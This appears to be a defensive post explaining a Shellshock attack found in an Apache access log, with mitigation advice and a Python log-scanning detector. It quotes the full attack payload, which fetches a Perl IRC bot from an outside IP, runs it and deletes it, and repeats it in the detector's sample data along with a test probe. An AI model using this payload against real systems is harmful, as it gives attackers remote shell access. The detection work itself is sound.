Entry from my Linux Apache2 access-log: 1038 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
wow1 is a stealthy Perl IRC bot script that gives the hacker shell access. If that script is present in /var/tmp, chances are your hacker is still in your box. If it is not, that does not mean you are safe.

The command in the log entry above does three things. This part downloads the script to your system:

wget -O /var/tmp/wow1 208.118.61.44/wow1

This part executes it:

perl /var/tmp/wow1

And when it exits, the script is deleted:

rm -rf /var/tmp/wow1

THINGS YOU (or your administrator) CAN DO:

Find the user account your web server runs as in /etc/passwd and change its login shell to /bin/false, or to something that doesn't exist. Then restart Apache. If the web server can't invoke a shell, it can't set a variable or call /bin/bash to do the hacker's dirty work. Be advised that this work-around only patches the hole in your web server; many other exploits are possible.

Upgrade bash to 4.3.25 immediately, and hide all other shells. At least one version each of sh and csh has been found to have the same vulnerability. Don't leave them where a hacker can expect to find them.
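Since the payload arrives in an HTTP header field, the access log is the first place to look for it. The following is an added example (my own code, not part of the original post) that scans Apache "combined"-format log lines for the "() {" function-definition prefix bash mis-parsed, pulls out the trailing command, the remote hosts it contacts and the files it drops, and then checks whether any of those dropped files are still on disk. The three sample log lines are constructed; the first reuses the exact payload quoted above, the third shows a whitespace variant in the Referer field. The file layout checked by dropped_files_present is hypothetical.

```python
"""Flag Shellshock-style payloads in Apache combined-format access logs.

Added example, not code from the original post. Assumes the default Apache
'combined' LogFormat; the sample lines below are constructed.
"""
import re
from pathlib import Path
from typing import Dict, List, Optional

# Constructed sample log lines. Line 1 carries the payload quoted in the post,
# line 2 is benign, line 3 is a whitespace variant placed in the Referer field.
SAMPLE_LOG = r'''
203.0.113.5 - - [25/Sep/2014:03:14:07 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 1038 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
198.51.100.7 - - [25/Sep/2014:03:15:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Sep/2014:03:16:44 +0000] "GET /cgi-bin/status HTTP/1.1" 200 77 "() { :; }; echo vulnerable" "curl/7.37.0"
'''

# Apache "combined" format. Quoted fields may contain backslash-escaped quotes,
# which is exactly how the payload in the post appears in the log.
_QUOTED = r'(?:[^"\\]|\\.)*'
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + _QUOTED + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>' + _QUOTED + r')" '
    r'"(?P<ua>' + _QUOTED + r')"$'
)

# "() {" is the function-definition prefix that vulnerable bash mis-parsed
# (CVE-2014-6271); allow flexible whitespace so "() { :;};" and "() { :; };"
# are both caught.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
# Everything after the first "};" is the trailing command bash would execute.
TRAILING_CMD_RE = re.compile(r'\}\s*;\s*(?P<cmd>.*)$', re.S)
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
# Drop locations used by the payload in the post; extend to taste (assumption).
DROP_PATH_RE = re.compile(r'/(?:var/)?tmp/[\w.\-]+|/dev/shm/[\w.\-]+')


def _unescape(field: str) -> str:
    """Undo the backslash escaping Apache applies inside quoted log fields."""
    return field.replace(r'\"', '"').replace('\\\\', '\\')


def analyse_payload(value: str) -> Optional[Dict]:
    """Return details for a Shellshock-shaped header value, or None if clean."""
    value = _unescape(value)
    if not SHELLSHOCK_RE.search(value):
        return None
    m = TRAILING_CMD_RE.search(value)
    cmd = m.group('cmd').strip() if m else ''
    return {
        'command': cmd,
        # dict.fromkeys de-duplicates while keeping first-seen order
        'remote_hosts': list(dict.fromkeys(IPV4_RE.findall(cmd))),
        'dropped_files': list(dict.fromkeys(DROP_PATH_RE.findall(cmd))),
    }


def scan_log(text: str) -> List[Dict]:
    """Parse log lines and return one hit per Shellshock-shaped header field."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ('referer', 'ua'):
            detail = analyse_payload(m.group(field))
            if detail:
                hits.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                             'field': field, 'request': m.group('req'), **detail})
    return hits


def dropped_files_present(hits: List[Dict], root: str = '/') -> List[str]:
    """Return the dropped-file paths named in the hits that still exist under root.

    The post notes that the payload deletes itself after running, so an empty
    result does not mean the host is clean; it only means the dropper is gone.
    """
    present = []
    for hit in hits:
        for p in hit['dropped_files']:
            if (Path(root) / p.lstrip('/')).exists():
                present.append(p)
    return list(dict.fromkeys(present))


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['ip']} [{h['field']}] {h['request']} -> {h['command']}")
        print(f"   hosts={h['remote_hosts']} files={h['dropped_files']}")
    print('still on disk:', dropped_files_present(found))
```

Run it against a real log with scan_log(open('/var/log/apache2/access.log').read()); the remote_hosts list gives you the addresses to block and to search for in other logs, and dropped_files_present tells you whether the dropper is still present, which, as the post says, is a strong sign the intruder has not left.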